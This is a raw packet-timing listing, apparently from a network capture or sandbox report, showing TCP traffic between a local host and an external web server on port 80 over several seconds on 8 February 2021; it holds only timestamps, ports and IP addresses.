                                                                              Feb 8, 2021 10:28:27.685015917 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:27.685080051 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:27.685112953 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:27.886195898 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:27.886255980 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:27.886415958 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:27.889501095 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:27.889559984 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:27.889664888 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:27.889699936 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:28.090977907 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:28.091048002 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:28.091110945 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:28.091151953 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:28.091278076 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:28.091315031 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:28.094352007 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:28.094398022 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:28.094578981 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:28.296118975 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:28.296149015 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:28.296174049 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:28.296197891 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:28.296407938 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:28.298966885 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:28.298990011 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:28.299108028 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:28.503935099 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:28.503994942 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:28.504034996 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:28.504070997 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:28.504128933 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:28.505243063 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:28.505287886 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:28.505296946 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:28.505327940 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:28.505361080 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:28.708678961 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:28.708714962 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:28.709434032 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:28.709456921 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:28.709673882 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:28.709738016 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:28.711452961 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:28.711520910 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:28.711529016 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:28.711536884 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:28.711544037 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:28.915923119 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:28.916088104 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:28.916125059 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:28.916145086 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:28.916214943 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:28.916224957 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:28.916276932 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:28.916277885 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:28.916285038 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:28.916322947 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:28.916342974 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:28.916371107 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:28.916394949 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:28.916429996 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:28.916475058 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:28.916493893 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:29.120992899 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:29.121026993 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:29.121056080 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:29.121089935 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:29.121128082 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:29.121179104 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:29.121211052 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:29.121318102 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:29.121371984 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:29.326150894 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:29.326210022 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:29.326252937 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:29.326291084 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:29.326328039 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:29.326354027 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:29.326366901 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:29.326395035 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:29.326405048 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:29.326406002 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:29.326411963 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:29.326416969 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:29.326448917 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:29.326450109 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:29.326484919 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:29.326513052 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:29.530951977 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:29.531013012 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:29.531054974 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:29.531092882 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:29.531131983 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:29.531207085 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:29.531265020 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:29.531271935 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:29.533341885 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:29.533375978 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:29.736124039 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:29.736156940 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:29.736181021 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:29.736207008 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:29.736479044 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:29.736532927 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:29.736541033 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:29.738075972 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:29.738205910 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:29.738210917 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:29.738297939 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:29.942842960 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:29.942926884 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:29.942955971 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:29.942982912 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:29.943006992 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:29.943039894 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:29.943065882 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:29.944509983 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:29.944545031 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:29.944677114 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:30.149962902 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:30.149995089 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:30.150077105 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:30.150104046 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:30.150129080 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:30.150152922 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:30.150186062 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:30.150233984 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:30.150242090 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:30.151513100 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:30.151544094 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:30.151617050 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:30.356379032 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:30.356416941 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:30.356455088 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:30.356482029 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:30.356508970 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:30.356719971 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:30.356767893 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:30.356776953 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:30.356781960 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:30.357953072 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:30.358097076 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:30.561196089 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:30.561232090 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:30.561248064 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:30.561264038 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:30.561280966 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:30.561518908 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:30.561585903 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:30.561593056 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:30.561598063 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:30.561610937 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:30.766086102 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:30.766114950 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:30.766140938 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:30.766343117 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:30.766376972 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:30.766408920 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:30.766467094 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:30.766525984 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:30.766539097 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:30.767636061 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:30.970762014 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:30.970968008 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:30.970971107 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:30.971025944 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:30.971035004 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:30.971077919 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:30.971127033 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:30.971127987 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:30.971138954 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:30.971190929 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:31.176309109 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:31.176348925 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:31.176429987 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:31.176471949 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:31.176515102 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:31.176525116 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:31.176567078 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:31.176572084 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:31.176573992 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:31.176579952 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:31.176585913 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:31.176634073 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:31.381071091 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:31.381136894 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:31.381189108 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:31.381206036 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:31.381238937 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:31.381248951 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:31.381256104 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:31.381304979 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:31.585445881 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:31.585628033 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:31.585694075 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:31.585738897 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:31.585752964 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:31.585783005 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:31.585787058 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:31.585829973 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:31.790067911 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:31.790105104 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:31.790189028 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:31.790236950 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:31.790277004 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:31.790314913 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:31.790318966 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:31.996789932 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:31.996819973 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:31.996849060 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:31.996877909 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:31.997014999 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:32.000993967 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:32.203608990 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:32.203682899 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:32.203725100 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:32.203763962 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:32.203861952 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:32.204010963 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:32.208592892 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:32.208652020 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:32.208772898 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:32.316287994 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:32.408226967 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:32.408247948 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:32.408411980 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:32.408473015 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:32.408533096 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:32.413209915 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:32.413249969 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:32.413393021 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:32.416275978 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:32.612818956 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:32.612864017 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:32.613111019 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:32.613742113 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:32.617857933 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:32.620515108 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:32.620691061 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:32.620748997 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:32.818103075 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:32.818212986 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:32.824987888 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:32.825047970 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:32.825125933 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:32.825186014 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:33.022675991 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:33.022701979 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:33.022994041 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:33.023055077 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:33.029460907 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:33.029500008 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:33.029690981 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:33.227931976 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:33.227977037 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:33.228328943 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:33.234119892 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:33.234158993 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:33.234381914 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:33.432899952 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:33.432931900 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:33.433176041 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:33.438755989 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:33.438791037 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:33.439097881 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:33.640119076 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:33.640151024 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:33.640183926 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:33.640208006 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:33.640305042 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:33.640348911 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:33.640355110 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:33.640360117 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:33.647017002 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:33.647049904 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:33.647114992 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:33.647172928 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:33.844959021 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:33.845041037 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:33.845099926 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:33.845110893 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:33.845154047 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:33.845161915 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:33.851737976 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:33.851778984 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:33.851979017 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:33.852018118 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:34.052057028 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:34.052088022 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:34.052117109 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:34.052218914 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:34.052287102 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:34.052298069 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:34.058980942 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:34.059242010 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:34.258869886 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:34.258929014 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:34.259226084 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:34.265119076 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:34.265189886 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:34.265378952 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:34.265422106 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:34.463639975 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:34.463711977 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:34.463926077 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:34.469863892 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:34.469927073 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:34.470094919 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:34.668499947 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:34.668565989 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:34.668741941 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:34.674501896 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:34.674556971 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:34.674607992 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:34.674655914 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:34.674681902 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:34.674712896 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:34.674757004 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:34.873249054 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:34.873303890 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:34.873517990 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:34.880965948 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:34.881156921 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:34.881161928 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:34.881266117 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:34.881272078 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:34.881345034 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:34.881351948 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:34.881462097 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:35.078035116 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:35.078083992 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:35.078334093 CET4916780192.168.2.2243.252.37.193
                                                                              Feb 8, 2021 10:28:35.086116076 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:35.086183071 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:35.086215973 CET804916743.252.37.193192.168.2.22
                                                                              Feb 8, 2021 10:28:35.086246967 CET804916743.252.37.193192.168.2.22
